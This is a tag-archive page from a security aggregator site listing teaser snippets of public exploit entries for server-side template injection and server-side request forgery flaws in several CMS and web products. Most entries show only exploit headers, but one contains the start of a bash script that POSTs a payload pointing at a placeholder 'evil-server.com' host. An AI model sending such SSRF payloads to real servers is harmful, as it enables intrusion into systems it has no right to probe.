Gibbon 26.0.00 Server-Side Template Injection / Remote Code Execution – Torchsec
April 2nd, 2024 | ๐
Text to Voice # Exploit Title: Gibbon LMS has an SSTI vulnerability on the v26.0.00 version# Date: 21.01.2024# Exploit Author:
Browsing the "ServerSide" Tag
FoF Pretty Mail 1.1.2 Server-Side Template Injection – Torchsec
March 30th, 2024 | ๐
iSpeech.org Exploit Title: FoF Pretty Mail 1.1.2 Extension for Flarum Server-SideTemplate Injection (SSTI)Date: 03/28/2024Exploit Author: Chokri HammediVendor Homepage: https://flarum.org/Software Link:
Ladder 0.0.21 Server-Side Request Forgery – Torchsec
March 9th, 2024 | ๐
iSpeech.org # Exploit Title: Ladder v0.0.21 Server-side request forgery (SSRF)# Date: 2024-01-20# Exploit Author: @_chebuya# Software Link: https://github.com/everywall/ladder# Version: v0.0.1
CMS Made Simple 2.2.19 Server-Side Template Injection – Torchsec
February 22nd, 2024 | ๐
Powered by iSpeech # Exploit Title: CMS Made Simple Version: 2.2.19 - SSTI# Date: 2024-21-02# Exploit Author: tmrswrr# Vendor Homepage:
HaoKeKeJi YiQiNiu Server-Side Request Forgery – Torchsec
January 15th, 2024 | ๐
TTS #!/bin/bash # Set target URL and payloadtarget_url="http://example.com/application/pay/controller/Api.php"payload="url=http://evil-server.com/exploit" # Send the malicious requestresponse=$(curl -s -X POST -d "$payload" "$target_url") #
Winter CMS 1.2.2 Server-Side Template Injection – Torchsec
December 6th, 2023 | ๐
iSpeech.org Winter CMS 1.2.2 Server-Side Template Injection Posted Dec 6, 2023 Authored by tmrswrr Winter CMS version 1.2.2 suffers from
SugarCRM 13.0.1 Server-Side Template Injection – Torchsec
October 27th, 2023 | ๐
iSpeech ----------------------------------------------------------------------------Sugar
Webedition CMS 2.9.8.8 Server-Side Request Forgery – Torchsec
October 10th, 2023 | ๐
TTS Demo Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRFApplication: Webedition CMSVersion: v2.9.8.8 Bugs: Blind SSRFTechnology: PHPVendor URL: https://www.webedition.org/Software Link:
Request-Baskets 1.2.1 Server-Side Request Forgery – Torchsec
August 11th, 2023 | ๐
iSpeech # Exploit Title: Request-Baskets v1.2.1 - Server-side request forgery (SSRF)# Exploit Author: Iyaad Luqman K (init_6)# Application: Request-Baskets v1.2.1#
Pyro CMS 3.9 Server-Side Template Injection – Torchsec
August 10th, 2023 | ๐
Powered by iSpeech # Exploit Title: Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)# Exploit Author: Daniel Barros (@cupc4k3d)
Ateme TITAN File 3.9 Job Callbacks Server-Side Request Forgery – Torchsec
July 12th, 2023 | ๐
iSpeech.org Ateme TITAN File 3.9 Job Callbacks SSRF File Enumeration Vendor: AtemeProduct web page: https://www.ateme.comAffected version: 3.9.12.43.9.11.03.9.9.23.9.8.0 Summary: TITAN File
PodcastGenerator 3.2.9 Server-Side Request Forgery – Torchsec
July 5th, 2023 | ๐
iSpeech.org #Exploit Title: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection#Application: PodcastGenerator#Version: v3.2.9#Bugs: Blind SSRF via XML Injection#Technology: PHP#Vendor URL:
Pydio Cells 4.1.2 Server-Side Request Forgery – Torchsec
May 30th, 2023 | ๐
Text to Speech Voices For longer running processes, Pydio Cells allows for the creation ofjobs, which are run in the
Camaleon CMS 2.7.0 Server-Side Template Injection – Torchsec
May 30th, 2023 | ๐
https://www.ispeech.org/text.to.speech Exploit Title: Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)Exploit Author: PARAG BAGULCVE: CVE-2023-30145 ## DescriptionCamaleon CMS v2.7.0 was
-
Donate Via Wallets
-
MetaMask -
Trust Wallet -
Binance Wallet -
WalletConnect
-
-
Popular
Debian Security Advisory 5664-1 – Torchsec April 18, 2024 -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5664-1 security@debian.orghttps://www.debian.org/security/… (9)
Google Sues App Developers Over Fake Crypto… April 8, 2024 ๎ Apr 08, 2024๎ NewsroomInvestment Scam / Mobile Security Google has filed… (8)- Red Hat Security Advisory 2024-1687-03 – Torchsec April 9, 2024 The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1687.jsonRed Hat officially shut… (8)
- AnyDesk 7.0.15 Unquoted Service Path – Torchsec April 9, 2024 # Exploit Title: AnyDesk 7.0.15 - Unquoted Service Path PrivilegeEscalation#… (7)
๐ฅMembers
-
๐ Forum Groups
-
linktr.ee/obewyn
Gloss